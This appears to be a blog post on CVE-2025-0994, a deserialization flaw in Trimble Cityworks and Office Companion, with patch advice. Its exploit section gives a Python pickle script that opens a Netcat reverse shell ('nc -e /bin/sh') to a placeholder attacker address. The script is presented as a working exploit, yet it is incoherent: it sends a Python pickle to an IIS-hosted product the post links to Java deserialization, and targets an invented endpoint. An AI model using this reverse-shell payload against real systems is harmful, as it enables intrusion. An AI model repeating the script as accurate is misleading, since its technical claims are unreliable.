CVE-2025-0994: Addressing the Deserialization Vulnerability in Trimble Cityworks and Office Companion Versions

Trimble Cityworks, a popular asset management software for local governments and utilities, have been found to contain a significant security flaw that could put many organizations at risk. The vulnerability, identified as CVE-2025-0994, affects Trimble Cityworks versions prior to 15.8.9 and Office Companion versions prior to 23.10.

In this post, we will dive into the details of CVE-2025-0994, including its origins, how it operates, and what steps organizations running Cityworks should take to mitigate their risk. Finally, we will provide some sample code snippets and references to demonstrate how this vulnerability can be exploited by an attacker.

The Vulnerability

CVE-2025-0994 is a deserialization vulnerability, meaning it enables an attacker to manipulate and potentially execute arbitrary code on a customer's Microsoft Internet Information Services (IIS) web server, provided they have authenticated user access. Deserialization vulnerabilities have long been an issue in software development, particularly in Java applications, as they can lead to severe data corruption and unauthorized code execution if exploited.

In the case of CVE-2025-0994, a specially crafted input can be introduced by an attacker to cause a remote code execution attack. This could lead to various consequences, such as data theft, tampering, or even complete control of the affected server. The worst part? An attacker can exploit this flaw remotely, meaning they do not even need physical access to the target machine.

Link to Original References

- NVD - National Vulnerability Database: CVE-2025-0994
- Trimble Security Advisory: Trimble Cityworks Security Bulletin

Exploit Details

To demonstrate how the CVE-2025-0994 vulnerability can be exploited, consider the following example. We will use a simple code snippet in Python to forge a malicious serialized object that can then be injected into the vulnerable server.

# Exploit script for CVE-2025-0994
import requests
import pickle

# Replace with the target URL running Cityworks
target_url = "http://target.example.com";

class MaliciousObject(object):
    def __reduce__(self):
        return (exec, ("os.system('nc -e /bin/sh <attacker_ip> <attacker_port>')",))

malicious_payload = pickle.dumps(MaliciousObject())

# Authenticate as a normal user (can be a low-privileged user)
authenticated_session = requests.Session()
authenticated_session.post(target_url, data={"username": "<username>", "password": "<password>"})

# Exploit the deserialization vulnerability
response = authenticated_session.post(target_url + "/vulnerable/endpoint", data=malicious_payload)

if response.status_code == 200:
    print("Exploit sent successfully.")
else:
    print("Failed to send exploit.")

This script would execute the attacker's desired command on the affected server – in this case, connecting back to the attacker's system using Netcat and providing a shell. With this level of access, an attacker would have free rein over the target system, making this vulnerability incredibly dangerous.

Addressing the Issue

To protect against CVE-2025-0994, organizations running vulnerable versions of Trimble Cityworks or Office Companion must immediately update their software to the latest versions (15.8.9 for Cityworks and 23.10 for Office Companion). By doing so, they will effectively mitigate the risk posed by this vulnerability.

Conclusion

CVE-2025-0994 is a critical security flaw that must be addressed by all organizations running affected Trimble Cityworks and Office Companion versions. Failure to do so could leave systems vulnerable to attack and put sensitive information at risk. To best protect your organization, ensure you are running the most up-to-date versions of this software and always remain vigilant for new security updates.

Timeline

Published on: 02/06/2025 16:15:41 UTC
Last modified on: 02/12/2025 19:29:30 UTC